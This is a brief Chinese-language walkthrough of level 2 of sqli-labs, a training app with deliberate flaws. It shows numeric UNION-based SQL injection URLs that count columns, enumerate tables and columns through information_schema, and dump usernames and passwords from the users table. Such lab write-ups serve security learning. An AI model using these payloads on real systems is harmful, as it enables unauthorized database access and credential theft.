sqli-labs练习（第二关）——数字型

1、先判断是字符型还是数字型。

172.16.11.222/sqli-labs/Less-2/?id=1

id=2-1 与 id=1的结果一样，说明是数字型。

2、确认字段位数

172.16.11.222/sqli-labs/Less-2/?id=1 order by 3

一共3位

3、确认占位信息

172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,3 --+

4、找库名

http://172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,database() --+

库名是security

5、找表名

172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

表名有emails、referers、uagents、users

6、找字段名

172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.COLUMNs where table_schema='security' and table_name='users'--+

users表里有id、username、password三个字段

7、找账号密码信息

172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(concat_ws(',',username,password) SEPARATOR '|') from users --+

这与字符型差不多，只是少了第二步的" 或 '而已